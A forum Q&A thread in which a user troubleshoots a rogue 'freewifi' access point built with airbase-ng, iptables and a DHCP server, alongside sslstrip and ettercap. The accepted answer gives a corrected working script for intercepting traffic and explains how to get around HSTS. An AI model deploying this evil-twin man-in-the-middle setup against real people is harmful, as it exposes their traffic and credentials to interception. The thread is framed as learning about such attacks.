Setting up a fake AP - problem with iptables and DNS server

Question

Im trying to set up a fake AP using aircrack-ng suite, DHCP server & iptables.

After creating the fake AP:

airmon-ng start wlan1
airbase-ng -c 11 -e "freewifi" wlan1mon

running iptables configuration and at0 routing rules(bash file):

#!/bin/sh
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- port 10000
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

running DHCP server : /etc/init.d/isc-dhcp-server start

/etc/dhcp/dhpd.conf file:

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0
{
    option subnet-mask 255.255.255.0;
    option domain-name "freewifi";
    option routers 10.0.0.1;
    option domain-name-servers 194.90.0.1;
    range 10.0.0.10 10.0.0.20;
}

/etc/default/isc-dhcp-server file:

Running sslstrip and ettercap :

sslstrip -f -p -k 
ettercap -p -u -T -q -i at0

First, no internet connection is given, I can connect to my "freewifi" AP and im even given an IP address, but internet connection cant be made:

then, I've noticed that it has Https on the address, sslstrip should strip down the s from https, so that was odd also.

I suspect that maybe I have a problem with my bridging (iptables), any help?

Kali Linux.

Start simple, then add other stuff. You haven't included the existing network configuration (any overlap on 192.168.1.128/25?). Lastly, what's the difference between a real and fake AP? — domen, Jan 26 '17 at 13:20
@domen well, at this moment I have one exiting network, 192.168.1.1/24 , and I "draw" my internet connection by using a subnet of that network, 192.168.1.128/25 , using an ethernet cable and my iptables configurations. About the real and fake AP, there's not much of a difference only Im not using any "real" modem/router to provide my own internet acces from an ISP so its called a fake AP. though a fake AP and a real AP should work just the same. — eyal360, Jan 26 '17 at 14:13
@schroeder I will try it, the only thing thats weird to me is that this is the "global standard" method for the fake AP I see on every post about this subject, so I dont quite uderstand why it doest work for me. Be back with some new info I hope. — eyal360, Jan 26 '17 at 14:17
Well, one obvious issue is that you have two networks on 192.168.1.0/25. I hoped me asking real vs. fake would make you realise you need to search for "how to set up AP", without "fake" or "sslstrip" or whatever. And do go for simple first (separate /24 network, nothing fancy or weird, static IP, leave NAT for later, first confirm packets get forwarded one hop). When that works, improve, goto 10. — domen, Jan 26 '17 at 15:47
@domen I understand what you are proposing, but if we take a look at the steps I make to create the AP, without sslstrip or ettercap, it should work just fine. since I only bridge between an internet-provider (Eth0) and an internet-reciever (at0) by using NAT and a DHCP server to make that happen. I will try using a different sub-network than 192.168.1.128/25 , I hope that is the reason. — eyal360, Jan 26 '17 at 20:04

OscarAkaElvis · Accepted Answer · 2017-01-30T09:33:13.087

2

You have different problems here. I think access point and dhcp are ok. Let's talk about iptables and sslstrip.

on sslstrip, you are using arguments -f -p -k 10000 but it makes no sense... port 10000 is default. And to set port you must use -l so you can avoid its use. Should be sslstrip -f -p -k and that's all or you can put sslstrip -f -p -k -l 10000 which is the same.

Talking about iptables and forwarding. echo 1 > /proc/sys/net/ipv4/ip_forward is ok. The route add makes no sense. You already have internet access on eth0 (I guess), so you don't need a route for the fake ap network. Of course at0 ip must be a different network range than eth0. Put a different ip range, something like 172.16.0.0/24 for example or any other.

But the order of the rules in iptables is important. Masquerading must be done at the end. And you have a typo on ssl port. You put 1000 instead of 10000!!!! <- OP edited his question and corrected it.

The flushes are ok:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

And then, if you have the general policy FORWARD with ACCEPT, it doesn't make sense to do FORWARD rules with -j ACCEPT like this iptables --append FORWARD --in-interface at0 -j ACCEPT. Forget rules about udp... web navigation is tcp, so this is not important: iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1. The only point of doing this is to redirect dns traffic to your own dns server... But I can't see you have a dns server on this example so makes no sense.

This should be:

iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

And that's all.

So the final compilation is:

#!/bin/sh
ifconfig at0 up
ifconfig at0 192.168.1.129 netmask 255.255.255.128
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Anyway, I can recommend to you a script on which I'm collaborating which automatize all of this stuff and is very handy!. It has a lot of FakeAP/Evil Twin features: airgeddon. Give it a try! is a good script already included in BlackArch, Wifislax and ArchStrike repositories.

Good luck! and remember to test sslstrip you must use urls without explicitely putting https. And facebook is a bad starting point because of HSTS. Try with outlook.com it works! To avoid HSTS is more advanced, you'll need sslstrip2 (is called too sslstrip+) and you'll need a proxy+dns (another incoming feature of airgeddon which is already developed and is under testing phase, is in a development branch and maybe this week could be in master).

edited Jan 30 '17 at 09:33

answered Jan 27 '17 at 08:31

OscarAkaElvis

5,185
3
17
48

Is it possible to bridge internet connection between wlan0 and wlan1mon? and not eth0 and wlan1mon? , can any wireless method be an Internet provider using bridging? Im only asking because, eth0 isnt working now for some reason, but wlan0 and wlan1 does work. – eyal360 Jan 29 '17 at 13:19
Also, I cant see the connection being made between at0 and eth0 , where is it shown in the "final compilation" you wrote? – eyal360 Jan 29 '17 at 13:35
All the connection you need between interfaces is enable forwarding... then, is suppossed you have on some interface (eth0, or wlan0 or whatever) internet access with a route pointing to 0.0.0.0 . The interface which the 0.0.0.0 route is what you need to put in the -o parameter of masquerading – OscarAkaElvis Jan 29 '17 at 14:00
I have changed the script as you specified, I can sense a slight difference in the performance, as in the connection is faster and such . it is assigned an IP by the DHCP server, and using ettercap I can see its requests for an IP and ACK's from the DHCP server back.(DHCP works) Above all that,I cant access the internet from my "victim" receiving the "server not found" message. **Any other suggestions?** About the tool you offered me, I'm trying to make it all manualy , to learn a bit more about MITM attacks, so I will definitely try it in the nearest future! thanks. – eyal360 Jan 29 '17 at 14:16
You are getting server not found message, but only with browser? I mean, can you ping internet from the victim? try to ping a dns google for example (8.8.8.8). If you can ping, the problem is now the sslstriping. If not, you have some problem about routing/forwarding/masquerading – OscarAkaElvis Jan 29 '17 at 14:37
I can ping and I didnt use sslstrip, at the moment I just want to see if I get a connection: [link]https://s27.postimg.org/n4be8x2tv/ping.jpg according to that I can ping to IP but not a domain name. – eyal360 Jan 29 '17 at 15:08
So you have a DNS problem. Put internet dns on your dhcp config. put `option domain-name-servers 8.8.8.8;` . If you keep `option domain-name-servers 192.168.1.129;` you should set up a DNS server too on that ip. Is easier to use internet dns. – OscarAkaElvis Jan 29 '17 at 16:20
First of, the solution you gave me was on-the-mark so thank you. Im encountering another problem with connectivity to all websites, thus I can only access facebook,youtube and google search from toolbar and any other website shows "Unable to connect" , I have tested my network speed, I thought maybe my internet connection is too slow or MTU having trouble fragmanting, its not the case, I cant wget or apt-get but I can ping. I have updated my questions above with all the details, I would appreciate if you take a look, thanks again. – eyal360 Jan 30 '17 at 09:15
Hey, so if your question was solved mark as solved please! and if you have more questions, don't hesitate to open another question. Anyway, could be good idea to remove the line `ifconfig at0 mtu 1400` to let it as default instead of setting it. – OscarAkaElvis Jan 30 '17 at 09:32
I have, forgot to delete the MTU when edited my question. I will post again thanks. – eyal360 Jan 30 '17 at 09:44

Setting up a fake AP - problem with iptables and DNS server

1 Answers1

Linked